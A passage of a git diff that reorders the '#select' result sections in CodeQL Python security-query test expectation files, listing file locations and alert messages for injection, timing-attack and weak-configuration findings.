Cross-site scripting vulnerability due to $@. | django_mail.py:25:32:25:66 | ControlFlowNode for Attribute() | a user-provided value | +| flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:13:22:13:41 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:18:14:18:33 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | flask_mail.py:31:24:31:43 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | flask_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:14:22:14:49 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:26:22:26:62 | ControlFlowNode for HtmlContent() | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | sendgrid_mail.py:37:41:37:68 | ControlFlowNode for Subscript | Cross-site scripting vulnerability due to $@. | sendgrid_mail.py:1:19:1:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:16:26:16:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:27:25:27:77 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | sendgrid_via_mail_send_post_request_body_bad.py:41:25:41:79 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to $@. | sendgrid_via_mail_send_post_request_body_bad.py:3:19:3:25 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_subparts.py:24:22:24:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_subparts.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | +| smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | smtplib_bad_via_attach.py:27:22:27:25 | ControlFlowNode for html | Cross-site scripting vulnerability due to $@. | smtplib_bad_via_attach.py:2:26:2:32 | ControlFlowNode for ImportMember | a user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected index 28c85388a97f..8d960a22dfde 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-091-XsltInjection/XsltInjection.expected @@ -1,10 +1,3 @@ -#select -| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | -| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | edges | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:3:26:3:32 | ControlFlowNode for request | provenance | | | xslt.py:3:26:3:32 | ControlFlowNode for request | xslt.py:10:17:10:23 | ControlFlowNode for request | provenance | | @@ -129,3 +122,10 @@ nodes | xsltInjection.py:46:38:46:48 | ControlFlowNode for xsltStrings [List element] | semmle.label | ControlFlowNode for xsltStrings [List element] | | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | semmle.label | ControlFlowNode for xslt_root | subpaths +#select +| xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | xslt.py:14:29:14:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xslt.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:12:28:12:36 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:21:29:21:37 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:31:24:31:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:40:24:40:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | +| xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | xsltInjection.py:50:24:50:32 | ControlFlowNode for xslt_root | This XSLT query depends on $@. | xsltInjection.py:3:26:3:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected index 3fa27edd5211..7798cdda143c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-094/Js2Py.expected @@ -1,5 +1,3 @@ -#select -| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | edges | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | provenance | | | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:9:5:9:6 | ControlFlowNode for jk | provenance | AdditionalTaintStep | @@ -8,3 +6,5 @@ nodes | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | semmle.label | ControlFlowNode for Fstring | subpaths +#select +| Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | Js2PyTest.py:10:18:10:28 | ControlFlowNode for Fstring | This input to Js2Py depends on a $@. | Js2PyTest.py:9:10:9:22 | ControlFlowNode for Attribute | user-provided value | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected index aa90dfaeea0d..5152f7353f25 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-1236/CsvInjection.expected @@ -1,7 +1,3 @@ -#select -| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | -| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | edges | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:9:19:9:25 | ControlFlowNode for request | provenance | | | csv_bad.py:9:19:9:25 | ControlFlowNode for request | csv_bad.py:16:16:16:22 | ControlFlowNode for request | provenance | | @@ -30,3 +26,7 @@ nodes | csv_bad.py:24:16:24:38 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | semmle.label | ControlFlowNode for csv_data | subpaths +#select +| csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:18:24:18:31 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:19:25:19:32 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | +| csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | csv_bad.py:25:46:25:53 | ControlFlowNode for csv_data | Csv injection might include code from $@. | csv_bad.py:9:19:9:25 | ControlFlowNode for ImportMember | this user input | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected index bd32259294e0..1577182b2dcd 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/PossibleTimingAttackAgainstHash.expected @@ -1,6 +1,3 @@ -#select -| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | -| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | @@ -12,3 +9,6 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths +#select +| TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | signature message | +| TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | Possible Timing attack against $@ validation. | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | MAC message | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected index 0d3ebb1cf116..0b7b2de8ddb9 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHash/TimingAttackAgainstHash.expected @@ -1,4 +1,3 @@ -#select edges | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | TimingAttackAgainstHash.py:27:24:27:32 | ControlFlowNode for signature | provenance | | | TimingAttackAgainstHash.py:26:17:26:41 | ControlFlowNode for Attribute() | TimingAttackAgainstHash.py:26:5:26:13 | ControlFlowNode for signature | provenance | | @@ -10,3 +9,4 @@ nodes | TimingAttackAgainstHash.py:30:12:30:47 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | TimingAttackAgainstHash.py:37:19:37:48 | ControlFlowNode for sign() | semmle.label | ControlFlowNode for sign() | subpaths +#select diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected index 25e04cafb6f8..14c8b8bf1eb1 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstHeaderValue/TimingAttackAgainstHeaderValue.expected @@ -1,6 +1,6 @@ -#select -| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | edges nodes | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | Timing attack against $@ validation. | TimingAttackAgainstHeader.py:14:12:14:46 | ControlFlowNode for Attribute() | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected index b65708ca34e4..80b074348966 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-208/TimingAttackAgainstSensitiveInfo/PossibleTimingAttackAgainstSensitiveInfo.expected @@ -1,9 +1,9 @@ -#select -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | -| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | edges | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | provenance | | nodes | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | semmle.label | ControlFlowNode for password | subpaths +#select +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:15:9:15:16 | ControlFlowNode for password | client-supplied token | +| TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | Timing attack against $@ validation. | TimingAttackAgainstSensitiveInfo.py:16:16:16:23 | ControlFlowNode for password | client-supplied token | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected index 2054ba4a231d..00c32be4267c 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-287-ConstantSecretKey/ConstantSecretKey.expected @@ -1,13 +1,3 @@ -#select -| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | -| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | -| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | -| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | edges | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | provenance | | | app_unsafe.py:4:1:4:9 | ControlFlowNode for aConstant | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | provenance | | @@ -42,3 +32,13 @@ nodes | config.py:18:18:18:52 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | config.py:18:43:18:51 | ControlFlowNode for aConstant | semmle.label | ControlFlowNode for aConstant | subpaths +#select +| app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | app_safe.py:5:28:5:37 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:5:28:5:36 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:6:18:6:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:7:30:7:38 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | app_unsafe.py:8:36:8:44 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | app_unsafe.py:4:13:4:23 | ControlFlowNode for StringLiteral | this constant String | +| config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | The SECRET_KEY config variable is assigned by $@. | config2.py:5:14:5:24 | ControlFlowNode for StringLiteral | this constant String | +| config.py:12:18:12:26 | ControlFlowNode for aConstant | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:12:18:12:26 | ControlFlowNode for aConstant | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:17:18:17:47 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:17:18:17:47 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | +| config.py:18:18:18:52 | ControlFlowNode for Attribute() | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | config.py:18:18:18:52 | ControlFlowNode for Attribute() | The SECRET_KEY config variable is assigned by $@. | config.py:7:13:7:23 | ControlFlowNode for StringLiteral | this constant String | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected index 8ffc7ac31d9b..097e3580fb1d 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-327-UnsafeUsageOfClientSideEncryptionVersion/UnsafeUsageOfClientSideEncryptionVersion.expected @@ -1,9 +1,3 @@ -#select -| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:31:9:31:19 | ControlFlowNode for blob_client | test.py:25:24:25:66 | ControlFlowNode for Attribute() | test.py:31:9:31:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:43:9:43:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:43:9:43:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | -| test.py:75:9:75:10 | ControlFlowNode for bc | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:75:9:75:10 | ControlFlowNode for bc | Unsafe usage of v1 version of Azure Storage client-side encryption | edges | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:7:19:7:21 | ControlFlowNode for BSC | provenance | | | test.py:3:1:3:3 | ControlFlowNode for BSC | test.py:35:19:35:21 | ControlFlowNode for BSC | provenance | | @@ -92,3 +86,9 @@ nodes | test.py:73:10:73:33 | ControlFlowNode for get_unsafe_blob_client() | semmle.label | ControlFlowNode for get_unsafe_blob_client() | | test.py:75:9:75:10 | ControlFlowNode for bc | semmle.label | ControlFlowNode for bc | subpaths +#select +| test.py:11:9:11:19 | ControlFlowNode for blob_client | test.py:3:7:3:51 | ControlFlowNode for Attribute() | test.py:11:9:11:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:21:9:21:19 | ControlFlowNode for blob_client | test.py:15:27:15:71 | ControlFlowNode for Attribute() | test.py:21:9:21:19 | ControlFlowNode for blob_client | Unsafe usage of v1 version of Azure Storage client-side encryption | +| test.py:31:9:31:19 | ControlFlowNode for 